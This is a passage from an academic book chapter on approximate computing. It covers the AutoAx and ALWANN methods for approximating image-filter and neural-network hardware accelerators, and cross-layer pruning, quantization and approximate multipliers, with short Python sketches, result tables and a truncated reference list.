Although the first step reduces the number of possible configurations, the number of combinations may still be enormous, especially for complex problems consisting of tens of operations. Therefore, the authors proposed an iterative heuristic algorithm (Algorithm 1) to construct the pseudo-Pareto set. The algorithm is a variant of stochastic hill climbing which starts with a random configuration (denoted as Parent), selects a neighbor at random (denoted as C), and decides whether to move to that neighbor or to examine another. The neighbor configuration is derived from Parent by modifying a randomly chosen item of the configuration (i.e., another circuit is picked from the library for a randomly chosen operation). The quality and hardware cost parameters of C (e_QoR and e_HW) are estimated by means of the estimation models. If the estimated values are non-dominated with respect to the Pareto set P, configuration C is inserted into the set, the set is updated (operation PARETOINSERT), and the candidate is used as the Parent in the next iteration. To avoid getting stuck in a local optimum, restarts are used: if the Parent remains unchanged for k successive iterations, it is replaced by a randomly chosen configuration from P. The quality of the resulting Pareto set depends on the fidelity of the estimation models and on the number of allowed iterations; the higher the fidelity, the better the results. The number of iterations depends on the chosen termination condition, which can be determined by the size of P, the execution time, or the maximum allowed number of iterations.
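Algorithm 1 is not reproduced in this extract; the following compact Python sketch captures the described loop under simplifying assumptions (the estimation models are passed in as callables, and the Pareto bookkeeping is minimal):

import random

def pareto_insert(front, cand):
    """Insert cand = (qor_err, hw_cost, cfg) if it is non-dominated;
    remove members that cand dominates (lower is better in both objectives)."""
    if any(q <= cand[0] and h <= cand[1] for q, h, _ in front):
        return False
    front[:] = [p for p in front if not (cand[0] <= p[0] and cand[1] <= p[1])]
    front.append(cand)
    return True

def build_pseudo_pareto(libs, est_qor, est_hw, iters=10**5, k=50):
    """libs[i]: reduced library of circuits for the ith operation;
    est_qor / est_hw: the ML estimation models (configuration -> float)."""
    parent = [random.choice(lib) for lib in libs]
    front, unchanged = [], 0
    for _ in range(iters):
        child = list(parent)
        op = random.randrange(len(libs))        # randomly chosen operation...
        child[op] = random.choice(libs[op])     # ...gets another library circuit
        cand = (est_qor(child), est_hw(child), tuple(child))
        if pareto_insert(front, cand):
            parent, unchanged = child, 0        # move to the neighbor
        else:
            unchanged += 1
            if unchanged >= k:                  # restart to escape local optima
                parent = list(random.choice(front)[2])
                unchanged = 0
    return front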
Results
The results are divided into two parts. Firstly, a detailed analysis of the results for
the Sobel ED is provided to illustrate the principle of the proposed methodology. In
the second part, only the final results are discussed due to the complexity of these problems and limited space.
Sobel Edge Detector To eliminate irrelevant circuits from the library, a score is calculated for each circuit. First, the target accelerator is profiled with a profiler that calculates the probability mass function (PMF) D_k for every operation (Fig. 6). Note that add_3 (resp. add_4) has an almost identical PMF to add_1 (resp. add_2). Figure 6 shows that the operand values (neighboring pixels) are typically very close. In the plot of D_add2, one can see regular white stripes caused by the shifting of the second operand.
Using the obtained probabilities, the WMED_k errors are calculated for all approximate circuits implementing the kth operation. Then the components are filtered: the process is guided by the area and WMED_k parameters of the isolated circuits and keeps only Pareto-optimal implementations. At the end of this process, the numbers of circuits in the reduced libraries are |RL_add1| = 35, |RL_add2| = 32, |RL_add3| = 37, |RL_add4| = 33, and |RL_sub| = 36.
The next step of the methodology is to construct models estimating SSIM and the hardware parameters from the parameters of the circuits belonging to one selected configuration. The WMED values of all employed circuits form the input vector for the QoR model; for the hardware model, the input vector consists of the power, area, and delay of all circuits. Several learning engines are compared to identify the most suitable one for the methodology (1500 configurations for learning and 1500 configurations for testing were randomly generated using the reduced libraries). The considered learning engines are the regression algorithms from the scikit-learn library for Python. Additionally, naïve models are constructed for area, $M_a(C) = \sum_{\forall c \in C} area(c)$, and for SSIM, $M_{SSIM}(C) = -\sum_{\forall c \in C} WMED_k(c)$, to test whether SSIM correlates with the cumulative arithmetic error and whether the area correlates with the sum of the areas of all employed circuits. These simple models are also considered in the comparisons.
Table 1 shows the fidelities of all constructed models when evaluated on the training and testing datasets. The best result on the testing datasets is provided by a random forest consisting of 100 different trees. The correlation between the estimated and the real area is shown in Fig. 7. The naïve models exhibit unsatisfactory results.
Fig. 7 Correlation of the estimated area and the real area obtained by the synthesis tool for the selected learning engines used in the Sobel ED experiment
The quality of the proposed heuristic algorithm used for Pareto frontier construction is evaluated next. Because of the low number of operations in the Sobel ED, all possible configurations derivable from the reduced libraries RL_k (i.e., 4.92 · 10^7 configurations in total) can be evaluated. With a reasonable number of evaluations (10^5), the proposed algorithm finds suboptimal solutions that are very close to the optimal ones; moreover, the solutions it finds are three orders of magnitude closer to the optimum than those of a standard random search.
More Complex Pipelines The methodology was also applied to obtain approximate implementations of two versions of the Gaussian image filter (fixed GF and generic GF). After profiling the accelerator and reducing the library of approximate circuits accordingly, random forest-based models of QoR and hardware parameters were created using 4000 training and 1000 testing randomly generated configurations. In the case of the fixed GF, the fidelity of the estimation models is 87% for hardware parameters and 92% for QoR; the fidelity of both models of the generic GF is 89%. If the synthesis and simulations run in parallel, the detailed analysis of one configuration takes 10 s on average, whereas the model-based estimation of one configuration takes 0.01 s on average.
The Pareto construction algorithm evaluated 10^6 candidate solutions. On average, 39 iterations were needed to find a new candidate suitable for the Pareto front.
Table 2 shows the size of the design space after performing particular steps of the proposed methodology. For example, there are 7.15 · 10^63 configurations in the generic GF design space. The elimination of irrelevant circuits from the library reduced the number of configurations to 3.75 · 10^23. This number is still enormous: analyzing all of these configurations would take 10^17 years. In contrast, the construction of 4000 random solutions for training the models takes approximately 11 h, 10^6 iterations of the proposed Pareto construction algorithm employing the models take 3 h, and the remaining 1000 configurations are analyzed in 3 h. Finally, approximately 100 configurations that are Pareto optimal in terms of area, SSIM, and energy are selected. In total, the proposed approach takes 17 h on a common desktop. Hypothetically, if full analysis were used instead of the estimation models in the Pareto front construction, the analysis of 10^6 configurations would take 115 days.
Figure 8 compares the resulting Pareto fronts obtained using the proposed methodology (orange line), the random search (RS)-based Pareto front construction algorithm (blue line), and the uniform selection approach (black line), which assigns components exhibiting the same error level to all operations.
Table 2 Size of the design space (number of configurations) after performing particular steps of the proposed methodology

Application   All possible     Lib. preprocessing   Pseudo-Pareto   Final Pareto
Sobel ED      1.96 · 10^15     4.92 · 10^7          335             62
Fixed GF      7.35 · 10^34     1.73 · 10^16         1166            132
Generic GF    7.15 · 10^63     3.75 · 10^23         946             102
Fig. 8 Pareto fronts showing best trade-offs between SSIM, area, and energy obtained using three
methods (orange, the proposed method; blue, random search; black, uniform selection) for three
approximate accelerators
Neural networks have become an important part not only of supercomputers but also of small embedded systems realizing machine learning at the edge. The structure of their hardware accelerators differs from the typical signal processing pipeline introduced in the previous section: the accelerator is organized as an array of processing elements. An arbitrary approximate component cannot be assigned to each layer of a DNN because the number of tiles (parts of the PE array) is limited. A significant proportion of the energy, 25–50% (Judd et al. 2018), is consumed by the computational path, which consists primarily of multiplications.
The energy cost of the computational path can be reduced using approximate computing because DNNs exhibit an inherent error resilience. The standard approach is to assign approximate components to the layers while considering the PE array construction constraints. A promising alternative is to construct the architecture together with the approximate components (neural architecture search) (Pinos et al. 2021), but this approach is computationally intensive. Therefore, the authors proposed the ALWANN methodology (Mrazek et al. 2019b), which assigns the approximate components with the help of a multi-objective evolutionary algorithm.
ALWANN Methodology
ALWANN requires the following inputs from the user: an already trained NN that is the subject of the approximation, a library of basic approximate components (adders, multipliers), and knowledge of the architecture of the final HW accelerator. Two HW-based architectures (as discussed in the previous section) are considered in this work: pipelined and power-gated arrays. For simplicity, the MAC units are implemented using accurate addition and approximate multiplication, but approximate addition can in general be introduced as well. Let L = {L1, L2, . . .} be a set of indexes of the convolutional layers of the NN and M be a set of available approximate w-bit multipliers. The user should specify the number of different tiles |T| the accelerator will consist of. Typically, |T| < |L|, and w = 8 is sufficient. Each tile's NFU consists of an array of identical MAC units. Each layer Li is executed on a single tile Tj.
The method outputs a set of AxNNs (the modified original NN together with the corresponding configuration of the HW accelerator tiles) that are Pareto optimal with respect to energy consumption and classification accuracy. The approximations are introduced into the original NN by replacing the accurate convolutional layers with approximate ones, together with weight tuning. Considering the structure
of the HW-based accelerator, two tasks are solved simultaneously: the methodology looks for the assignment of approximate multipliers to the MACs in the systolic array (SA) tiles T = {T1, T2, . . .}, i.e., a mapping map_TM: T → M, and for the assignment of the convolutional layers to the SA tiles, i.e., a mapping map_LT: L → T. The weights in each layer are updated according to the properties of the particular multiplier assigned to the tile that computes the output of the layer.
The overall architecture of the proposed framework is shown in Fig. 9. The framework expects that a fully specified NN is available (typically in protobuf format). If not already done, the NN is first quantized to avoid floating-point MAC operations. The protobuf specification of the quantized NN is then edited, and all convolutional layers are replaced by approximate ones. This step is necessary to be able to specify, separately for each layer, which multiplier should be used to calculate the output of the MACs. To obtain a Pareto set of various AxNNs, the authors propose to use the multi-objective genetic algorithm NSGA-II (Deb et al. 2002). The algorithm maintains a population of |P| candidate solutions, each represented as a pair (map_TM, map_LT); the search starts from an initial population of randomly generated candidates.
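To make the representation tangible, the sketch below encodes a candidate as the pair (map_TM, map_LT) and shows a simple mutation; the tile/layer counts, multiplier names, and mutation rate are hypothetical, and the NSGA-II selection loop itself (e.g., from an off-the-shelf library) is omitted:

import random

N_LAYERS, N_TILES = 8, 3                        # |L| and |T|, hypothetical
MULTIPLIERS = ["mul8_acc", "mul8_ax1", "mul8_ax2", "mul8_ax3"]   # the set M

def random_candidate():
    map_tm = [random.choice(MULTIPLIERS) for _ in range(N_TILES)]   # T -> M
    map_lt = [random.randrange(N_TILES) for _ in range(N_LAYERS)]   # L -> T
    return (map_tm, map_lt)

def mutate(candidate, p=0.2):
    map_tm, map_lt = list(candidate[0]), list(candidate[1])
    for t in range(N_TILES):
        if random.random() < p:                  # reassign a tile's multiplier
            map_tm[t] = random.choice(MULTIPLIERS)
    for l in range(N_LAYERS):
        if random.random() < p:                  # move a layer to another tile
            map_lt[l] = random.randrange(N_TILES)
    return (map_tm, map_lt)

Each candidate is then evaluated on the two objectives: classification accuracy (simulated inference with the assigned multipliers, after weight tuning) and the energy of the multiplications.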
Fig. 10 Our tool flow for retraining-less approximation of ResNet neural network
A uniform architecture employing a single approximate multiplier in all layers (Mrazek et al. 2016) achieves results comparable to AxNNs with all but one layer approximated. In contrast, an AxNN with only one approximate layer leads to significantly worse trade-offs because of the small energy savings. Overall, the proposed method provides better trade-offs between accuracy and energy consumption than the uniform NN architectures reported in state-of-the-art works.
A bottleneck of the algorithm was the expensive simulation of the approximate multipliers on a CPU. Although the multiplier outputs were cached, the single-core application was 10× slower than vectorized accurate multiplication. Since one inference pass over the full dataset took 54.5 min, 7.5 days were needed for the construction of the approximate neural network. This problem was addressed in Vaverka et al. (2020) by employing approximate operations on a GPU: the speed was improved by more than 200×, and the most complex 50-layer NN can be approximated in less than 2 h on a single GPU.
Overall Results Table 3 gives the parameters of the best AxNNs constructed using the proposed tool. The following parameters are reported for each network: accuracy, relative accuracy, and the total and relative energy of the convolutional operations. The relative values are calculated with respect to the original quantized (8-bit) ResNet. The quality of the obtained AxNNs for ResNet-50 is very promising: if a target application is able to tolerate a 1% accuracy drop (from 89.15% to 88.1%), for example, more than 30% of the energy can be saved. The evaluation across different
architectures shows that it is not advantageous to use AxNNs having more than
Table 3 Parameters of selected AxNNs implementing the CIFAR-10 dataset. The relative values are compared to the accurate 8-bit neural network, and the total energy is expressed in multiples of the energy of one accurate multiplication, E_M

AxNN                 Accuracy   Relative accuracy   Relative energy   Total energy [×E_M]
ResNet-50 (8-bit)    89.15%     100.00%             100.00%           120.27 M
AxResNet-50          89.30%     100.17%             83.29%            100.17 M
Fig. 12 Comparison of the proposed AxNNs (crosses) with accurate quantized NNs (points) – the energy axis reports the energy of the multiplications in the convolutional layers, where E_M is the energy of one multiplication. Gray points represent quantized networks that were not approximated (complexity reduction)
Comparison with State of the Art (SoA) Table 4 compares the proposed approach with state-of-the-art approaches for reducing the energy of NNs that have been evaluated on the CIFAR-10 dataset. Table 4 includes the reported energy reduction and accuracy degradation; the requirement for retraining, the uniformity of the architecture, and the complexity of the NN are also provided. In contrast with multiplier-less multiplication, where only four different architectures were proposed (Sarwar et al. 2018), the proposed approach allows finding new design points with high granularity and without retraining. Besides that, it enabled the authors to find low-energy AxNNs exhibiting low accuracy, e.g., <80%. Even these solutions can be beneficial, for example, as one of the initial stages of a progressive chain classifier (Choi and Venkataramani 2019).
[Figure (cross-layer approximate computing stack): software-level approximations (e.g., loop perforation), architectural-level approximations (e.g., functional approximation, approximate caches), and circuit/device-level approximations (e.g., truncation, voltage over-scaling) in a multi-/many-core approximate architecture with approximate cores AAc1…AAcN, low-cost approximate caches (AppxC), and approximate main memory, supported by consolidated power/performance characterization, run-time compensation management, and online quality assessment]

Cross-Layer Approximations for Error-Tolerant Applications

Methodology for Combining Hardware- and Software-Level Approximations
DNNs are widely used in many applications due to their state-of-the-art performance (LeCun et al. 2015). Studies have shown that they are (to some extent) resilient to errors in intermediate computations. This property can be exploited through different types of approximations to reduce their execution cost and enable their deployment on resource-constrained devices. Toward this, various software-level and hardware-level approximation/optimization techniques have been proposed: at the software level, pruning and quantization are employed to reduce the complexity of the network and of the computations, respectively, while at the hardware level, customized hardware accelerators and approximate arithmetic modules are employed (as also shown in section “Deep Neural Networks (DNNs)”). These techniques can be combined in a systematic manner to achieve high efficiency gains. Figure 14 presents a cross-layer methodology that combines pruning and quantization techniques with hardware-level optimizations (Hanif and Shafique 2021). The methodology consists of the following steps:
• Pruning: At the software level, the most effective technique for optimizing
DNNs is pruning. It involves removing the ineffectual weights from the network
to reduce the complexity of DNNs. Based on its effectiveness, the cross-layer
methodology employs pruning as Step 1. An iterative pruning technique is
mainly employed that reduces the number of parameters in multiple iterations,
where each iteration is (optionally) followed by partial retraining to compensate
for the accuracy loss. The weights to be removed are selected based on their
saliency, which can be estimated using L1-norm/L2-norm or by using a complex
back-propagation algorithm. The number of weights removed in each iteration
and the amount of retraining after each iteration are two key hyper-parameters
that can impact the compression and/or accuracy of the resultant network and,
therefore, have to be selected carefully. The iterations are performed until the accuracy of the network drops below the user-defined accuracy constraint, and the network from the second-to-last iteration (the last one that still satisfies the constraint) is forwarded to the next step for further optimization.
Fig. 14 A cross-layer optimization flow for DNNs (Hanif and Shafique 2021)
• Quantization: The precision of DNN data structures impacts the memory
requirements and the complexity of the computational modules. Quantization
is employed to represent weights and activations using low-precision fixed-point
format. It not only reduces the memory requirements for the inference stage but
also helps in simplifying the hardware modules, e.g., MAC units. Therefore, the
methodology employs quantization in Step 2 to further compress the network and
simplify the logic units at the hardware level. The quantization process can be
coupled with retraining to compensate for the accuracy loss due to quantization
errors in the computations. Moreover, pruning and quantization can also be
combined in a single unified process (Tung and Mori 2018). However, such
methods require sophisticated optimization algorithms to efficiently explore the
combined design space and propose an effective solution.
• Hardware Approximations: Specialized hardware accelerators are used for
energy-efficient processing of data in real-world systems. These accelerators
can be equipped with approximate units to further boost the efficiency gains.
Toward this, Step 3 of the methodology explores the potential of hardware-
level approximations, e.g., functional approximation of adders and multipliers.
This step performs design space exploration of approximate modules to find
the most suitable configurations that offer high efficiency while meeting the
user-defined quality constraints. The step also explores the potential of internal
self-healing modules, as they can offer better error characteristics in case of
vector operations. These approximations can also be coupled with retraining to
partially compensate for the accuracy loss due to approximations.
Case Studies for Improving the Energy and Performance Efficiency of DNN Inference

Structured Pruning
This section highlights the effectiveness of the pruning step (i.e., Step 1 in Fig. 14)
for improving the efficiency of DNN inference. Figure 15 presents the flow
considered in this study for pruning filters/neurons from a pre-trained DNN. The
main steps of the flow are:
1. Given a pre-trained DNN, first, the methodology computes the saliency of each
filter/neuron of the network using a suitable saliency measure, e.g., L1-norm.
2. Then, for each layer of the DNN, it creates a copy of the network and removes x% of the least significant filters/neurons from that layer while keeping all the other layers intact.
3. The methodology then computes the accuracy and compression ratio of each
model and registers them in θ . Note that for fast execution of the methodology,
only a subset of the validation dataset is used to estimate the accuracy.
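A minimal PyTorch-style sketch of steps 1 and 2 (L1-norm saliency and a per-layer trial copy) is given below; the helper names are illustrative, and the necessary rewiring of the following layer's input channels, batch-norm parameters, etc., is omitted:

import torch
import torch.nn as nn

def filter_saliencies(conv: nn.Conv2d) -> torch.Tensor:
    # Step 1: L1-norm saliency of every output filter
    return conv.weight.detach().abs().sum(dim=(1, 2, 3))

def prune_layer(conv: nn.Conv2d, fraction: float = 0.2) -> nn.Conv2d:
    # Step 2: copy of the layer with the least significant filters removed
    saliency = filter_saliencies(conv)
    n_keep = max(1, int(round(conv.out_channels * (1.0 - fraction))))
    keep = torch.topk(saliency, n_keep).indices.sort().values
    pruned = nn.Conv2d(conv.in_channels, n_keep, conv.kernel_size,
                       stride=conv.stride, padding=conv.padding,
                       bias=conv.bias is not None)
    pruned.weight.data = conv.weight.data[keep].clone()
    if conv.bias is not None:
        pruned.bias.data = conv.bias.data[keep].clone()
    return pruned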
[Fig. 15 The considered structured pruning methodology (Hanif and Shafique 2021): pruning and fine-tuning iterate while the validation accuracy remains above the user-defined accuracy constraint (AC); once it falls below AC, the DNN from the previous iteration is returned as the output]
To show the effectiveness of pruning, the above flow is employed to prune filters/neurons from the LeNet5 and VGG11 networks, both trained on the Cifar10 dataset. For these experiments, $C = 100 - (Accuracy + 4 \cdot P_i / \sum_{j \in \{\text{all layers}\}} P_j)$ is used as the cost function, where Accuracy is the estimated accuracy after pruning the ith layer and $P_i$ is the number of parameters in the ith layer. For pruning, x is set to 20, and for fine-tuning during the process, y is set to 2. The results are presented in Figs. 16a and 17a. It can be seen from the figures that the methodology helps maintain the accuracy close to its baseline up to a significant amount of compression; after a point, any further compression results in a rapid decrease in accuracy. Note that intermediate fine-tuning, i.e., y > 0, is the key factor for achieving a high compression ratio.
[Fig. 16: plots (a) and (b); models a–c are marked, and the annotation in (b) reads: “The quantization level after which the accuracy starts decreasing rapidly regardless of the pruning level”]
Fig. 16 Results of structured pruning when applied to the LeNet5 network trained on the Cifar10
dataset (Hanif and Shafique 2021). (a) Impact of structured pruning on accuracy. (b) Impact of
quantization on the accuracy of the models having different compression ratios. The models are
marked in (a)
[Fig. 17: (a) test accuracy [%age] vs. model size reduction [%age], models a–e marked; (b) test accuracy [%age] vs. bit width, with the annotation: “The quantization level after which the accuracy starts decreasing rapidly regardless of the amount of pruning”]
Fig. 17 Results of structured pruning when applied to the VGG11 network trained on the Cifar10
dataset (Hanif and Shafique 2021). (a) Impact of structured pruning on accuracy. (b) Impact of
quantization on the accuracy of the models having different compression ratios. The models are
marked in (a)
Quantization
To further compress the DNN and to simplify the arithmetic modules in hardware
accelerators, network quantization (i.e., Step 2 in Fig. 14) is applied after pruning.
For this study, a post-training quantization approach with a uniform bit-width across the network is considered for both weights and activations. To quantize the weights of a layer, the following equations are employed:

$$W^{\langle l\rangle}_{scale} = 2^{\,floor\left(\log_2\left(\frac{2^{n-1}-1}{\max(abs(W^{\langle l\rangle}))}\right)\right)}$$

$$\hat{W}^{\langle l\rangle}_i = round\left(W^{\langle l\rangle}_i \times W^{\langle l\rangle}_{scale}\right)$$

where $W^{\langle l\rangle}$ is the set of all the weights, $W^{\langle l\rangle}_i$ is the ith element in $W^{\langle l\rangle}$, $\hat{W}^{\langle l\rangle}$ represents the set of quantized weights, $W^{\langle l\rangle}_{scale}$ is the scale factor, and $n$ is the bit-width.
To quantize the activations, first, the activations are profiled using a set of input samples, and then the scale factor is defined using the following equation:

$$A^{\langle l\rangle}_{scale} = 2^{\,floor\left(\log_2\left(\frac{2^{n-1}-1}{\max(abs(A^{\langle l\rangle}))}\right)\right)}$$

Here $A^{\langle l\rangle}$ is the set of all the logged activations at the input of the lth layer, and $A^{\langle l\rangle}_{scale}$ is the scale factor. At run-time, the activations are scaled using the following equation:

$$\hat{A}^{\langle l\rangle}_i = round\left(A^{\langle l\rangle}_i \times A^{\langle l\rangle}_{scale}\right) \qquad (9)$$

where $\hat{A}^{\langle l\rangle}$ represents the quantized activations. Note that $W^{\langle l\rangle}_{scale}$ and $A^{\langle l\rangle}_{scale}$ are intentionally defined to be powers of two in order to simplify the intermediate conversion operations.
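This power-of-two, post-training scheme can be prototyped in a few lines of NumPy, as sketched below (the saturation to the representable range is added for robustness and is not part of the equations above; names are illustrative):

import numpy as np

def power_of_two_scale(values: np.ndarray, n_bits: int) -> float:
    # Power-of-two scale factor, as in the equations for W_scale and A_scale
    max_q = 2 ** (n_bits - 1) - 1
    return 2.0 ** np.floor(np.log2(max_q / np.max(np.abs(values))))

def quantize(values: np.ndarray, scale: float, n_bits: int) -> np.ndarray:
    # Round to the integer grid and saturate to the fixed-point range
    max_q = 2 ** (n_bits - 1) - 1
    return np.clip(np.round(values * scale), -max_q - 1, max_q)

w = np.random.randn(64, 3, 3, 3).astype(np.float32)   # example "weights"
s = power_of_two_scale(w, n_bits=8)
w_q = quantize(w, s, n_bits=8)                        # quantized weights
print("max abs. quantization error:", np.max(np.abs(w - w_q / s)))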
Figure 16b shows the accuracies of five DNNs when exposed to different levels
of quantization. All the DNNs are variants of the same LeNet5 model trained on the
Cifar10 dataset but have different pruning ratios. The baseline models are marked
in Fig. 16a with the help of labels. From the figure, it can be observed that the
networks with high compression ratios are more sensitive to quantization. Moreover,
the accuracy of the networks drops sharply after a specific quantization level. The
same trend is observed for the VGG11 network trained on the Cifar10 dataset (see
Fig. 17). From this analysis, it can be concluded that higher pruning levels are
usually more beneficial than post-training quantization for achieving high overall
compression while maintaining close to the baseline accuracy.
Hardware-Level Approximations: Impact of Self-Healing and Nonself-Healing Designs on DNN Accuracy

This section analyzes the impact that using approximate arithmetic modules for the internal dot-product operations of DNNs has on their accuracy. This corresponds to Step 4 in Fig. 14. For this analysis, modules designed using conventional as well as
self-healing methods are employed. The key distinction between these designs can
be observed from Fig. 18. Figure 18a illustrates a system where the computational
modules are replaced with their approximate variants without considering the
overall computational flow. In such designs, the selection can be based on thorough
design space exploration, but the system is not designed such that the approximation error of one module is compensated by the errors of the other modules. The self-healing designs exploit the fact that most real-world applications involve vector or accumulation operations, in which errors of opposite polarity produced by complementary approximate modules can largely cancel one another.
[Fig. 18: (a) a conventional approximate system, in which approximate Modules 1 and 2 are simply cascaded from inputs to output; (b) a self-healing design, in which an approximation stage (approximate Modules 1a and 1b, or a single approximate Module 1) is followed by a healing stage (Module 2) whose operation compensates the errors of the approximation stage]
Fig. 18 A comparison of conventional and self-healing approaches (Hanif and Shafique 2021)
[Fig. 19a: partial-product array of an 8-bit Baugh-Wooley multiplier built from 2×2 multipliers, with ones extended for larger output widths. Legend: a_i, ith bit of operand A; b_j, jth bit of operand B; pp_ij, partial product of a_i and b_j; P_{O-1}, MSB of the product; O, number of output bits; M<t>, 2×2 multiplier of type t]
Fig. 19 Types of 8 × 8 approximate multipliers considered for simulations (Hanif and Shafique
2021). (a) An 8-bit multiplier design based on Baugh-Wooley algorithm realized using 2 × 2
multipliers. (b) Config. 1. (c) Config. 2. (d) Config. 3. (e) Config. 4. (f) Config. 5. (g) Config. 6.
(h) Config. 7. (i) Config. 8. (j) Config. 9
The configurations that generate errors of only one polarity represent the nonself-healing designs (i.e., the configurations in Fig. 19b–f), and the configurations that generate both positive and negative errors represent the self-healing designs (i.e., the configurations in Fig. 19g–j). The hardware characteristics of all the configurations are presented in Table 6. The results are generated for a 65 nm technology using the Cadence Genus synthesis tool with the TSMC 65 nm library.
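The self-healing principle can be seen directly in the error behavior of the 2×2 building blocks of Fig. 20, which differ from the accurate M<0> only in the 3×3 product (9 → 7, 11, or 5): M<1> and M<2> err in opposite directions, so configurations mixing them can cancel errors internally, whereas M<3> only underestimates. A few lines of Python (illustrative) reproduce their mean errors:

from itertools import product

THREE_TIMES_THREE = {0: 9, 1: 7, 2: 11, 3: 5}   # M<0>..M<3> outputs for 3*3

def mul2x2(a, b, kind):
    return THREE_TIMES_THREE[kind] if (a, b) == (3, 3) else a * b

for kind in range(4):
    errs = [mul2x2(a, b, kind) - a * b for a, b in product(range(4), repeat=2)]
    print(f"M<{kind}>: mean error over all 16 inputs = {sum(errs) / 16:+.3f}")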
To evaluate the impact of approximations on the accuracy of DNNs, functional models of these approximate multipliers are integrated into a PyTorch-based simulation framework.
Fig. 20 The 2 × 2 multiplier designs used for building 8 × 8 approximate multipliers (Hanif and
Shafique 2021). (a) Accurate 2 × 2 multiplier: M<0>. (b) Approximate 2 × 2 multiplier having
3 × 3 → 7: M<1>. (c) Approximate 2 × 2 multiplier having 3 × 3 → 11: M<2>. (d) Approximate
2 × 2 multiplier having 3 × 3 → 5: M<3>. (e) Truth table of M<0>. (f) Truth table of M<1>. (g)
Truth table of M<2>. (h) Truth table of M<3>
Table 5 Error characteristics of the multiplier configurations presented in Fig. 19 (Hanif and
Shafique 2021)
Multiplier configurations
Ax. 1 Ax. 2 Ax. 3 Ax. 4 Ax. 5 Ax. 6 Ax. 7 Ax. 8 Ax. 9
MSE 0.25 9.75 266.25 3102.30 24806.00 7.50 78.00 2128.00 2547.00
MED 0.13 1.13 7.13 23.13 55.13 0.94 3.38 19.94 21.90
Mean error -0.13 -1.13 -7.13 -23.13 -55.13 0.00 0.00 -0.25 -0.13
Table 6 Hardware characteristics of the multiplier configurations presented in Fig. 19 (Hanif and
Shafique 2021)
Multiplier configurations
Accurate Ax. 1 Ax. 2 Ax. 3 Ax. 4 Ax. 5 Ax. 6 Ax. 7 Ax. 8 Ax. 9
Area [cell area] 753 716 696 616 609 571 726 727 672 670
Power [μW] 46.04 44.98 44.92 40.81 40.98 38.96 45.49 45.05 43.48 42.94
Delay [ns] 1.92 1.86 1.73 1.73 1.73 1.73 1.95 1.87 1.73 1.77
PDP [fJ] 88.40 83.66 77.71 70.60 70.90 67.40 88.71 84.24 75.22 76.00
[Fig. 21 plot: test accuracy [%age] of pruned variants a–c for the accurate multiplier and configurations 1–9 (1–5 non-self-healing, 6–9 self-healing)]
Fig. 21 Impact of using approximate multipliers on the accuracy of different pruned variants of
the LeNet5 network (Hanif and Shafique 2021). The considered variants are marked in Fig. 16a
[Fig. 22 plot: test accuracy [%age] of pruned variants a–e for the accurate multiplier and configurations 1–9 (1–5 non-self-healing, 6–9 self-healing); annotation: “Aggressive approximations lead to unusual behavior”]
Fig. 22 Impact of using approximate multipliers on the accuracy of different pruned variants of
the VGG11 network (Hanif and Shafique 2021). The considered variants are marked in Fig. 17a
Figure 21 shows the results obtained when the different approximate multiplier configurations (shown in Fig. 19) are used for the LeNet5 network trained on the Cifar10 dataset. Note that, for this analysis, multiple variants of the network are considered, each having experienced a different level of pruning; the network variants are highlighted in Fig. 16a. As can be seen in Fig. 21, with an increase in the compression ratio, the model becomes increasingly sensitive to approximations. Similar results are observed for the VGG11 network (see Fig. 22).
Conclusions
Approximations can offer high energy savings while meeting user-defined quality
constraints. Besides the well-known techniques such as quantization (i.e., bit-width
reduction) and code simplification (e.g., reducing the number of iterations of a loop),
it is possible to approximate the functionality of circuits as well. The first part of
the chapter primarily focused on functional approximations, where approaches for
building approximate components such as adders and multipliers using both manual
and automated methods were introduced.
The following section focused on the construction of complex hardware accel-
erators using existing libraries of approximate components (such as EvoApproxLib,
lpAcLib, or GeAR). Two different types of accelerators were presented. For acceler-
ators with irregular structures such as image processing accelerators, an automatic
design space exploration and circuit approximation methodology AutoAx was
presented. This methodology replaces operations in an original accelerator with
approximate variants taken from a library of approximate components/circuits. To
accelerate the approximation process, QoR and hardware parameters are estimated
using computational models created using machine learning methods. It was shown
that the AutoAx methodology generates approximate accelerators that offer high-quality trade-offs between QoR and hardware parameters. These trade-offs are better than those of SoA approaches based on selecting components with the same error level or on random selection.
The authors also focused on accelerators with a regular structure of processing elements. The ALWANN methodology, which approximates hardware accelerators for convolutional neural networks and optimizes their energy consumption for inference, was introduced; it achieves better energy savings at the same accuracy than other algorithms that employ retraining. Retraining typically results in (i) the approximation of significantly smaller networks due to scalability issues (Mrazek et al. 2016; Zhang et al. 2015) or (ii) a limited set of considered approximate components (Sarwar et al. 2018).
Functional approximation is not the only approach to trade quality for energy
efficiency. Developers may also use other techniques such as quantization and
pruning. Toward this, a cross-layer optimization for neural networks was presented,
which systematically combines software-level and hardware-level approximation
techniques. The results showed that cross-layer optimization yields better quality-efficiency trade-offs. However, note that cross-layer approximate computing
is still an active area of research that is yet to uncover the ultimate potential of
approximate computing. One of the key hurdles toward achieving that is the lack
of sophisticated methodologies for evaluating the error masking and propagation
characteristics of approximations, which will enable the projection of approxi-
mations across layers and therefore enable fast design space exploration. From
the perspective of approximations for DNNs, as most of the approximate components have irregular error distributions, there is a need for methodologies to adapt (retrain) DNNs to such approximations. Apart from that, there is a pressing need to explore and assess the security of approximated DNNs against adversarial attacks.
Acknowledgments This work was partially supported by the Czech Science Foundation project 21-13001S.
References
Bailey B, Martin G, Piziali A, Burton M, Greenbaum J, Hashmi K, Haverinen A, Lavagno
L, Meredith M, Murray B et al (2007) ESL design and verification: a prescription for
electronic system level methodology. Elsevier Science. https://books.google.cz/books?id=
raoeAQAAIAAJ
Češka M, Matyáš J, Mrazek V, Sekanina L, Vasicek Z, Vojnar T (2017) Approximating complex
arithmetic circuits with formal error guarantees: 32-bit multipliers accomplished. In: 2017
IEEE/ACM international conference on computer-aided design (ICCAD), pp 416–423
Chandrasekharan A, Soeken M, Große D, Drechsler R (2016) Approximation-aware rewriting of
AIGs for error tolerant applications. In: Proceedings of the 35th international conference on
computer-aided design, ICCAD’16. ACM, New York, pp 83:1–83:8
Chan WTJ, Kahng AB, Kang S, Kumar R, Sartori J (2013) Statistical analysis and modeling
for error composition in approximate computation circuits. In: 2013 IEEE 31st international
conference on computer design (ICCD), pp 47–53
Chang IJ, Mohapatra D, Roy K (2011) A priority-based 6t/8t hybrid sram architecture for
aggressive voltage scaling in video applications. IEEE Trans Circuits Syst Video Technol
21(2):101–112
Chen TH, Alaghi A, Hayes JP (2014) Behavior of stochastic circuits under severe error conditions.
it – Inf Technol 56(4):182–191
Chippa VK, Chakradhar ST, Roy K, Raghunathan A (2013) Analysis and characterization
of inherent application resilience for approximate computing. In: Proceedings of 50th
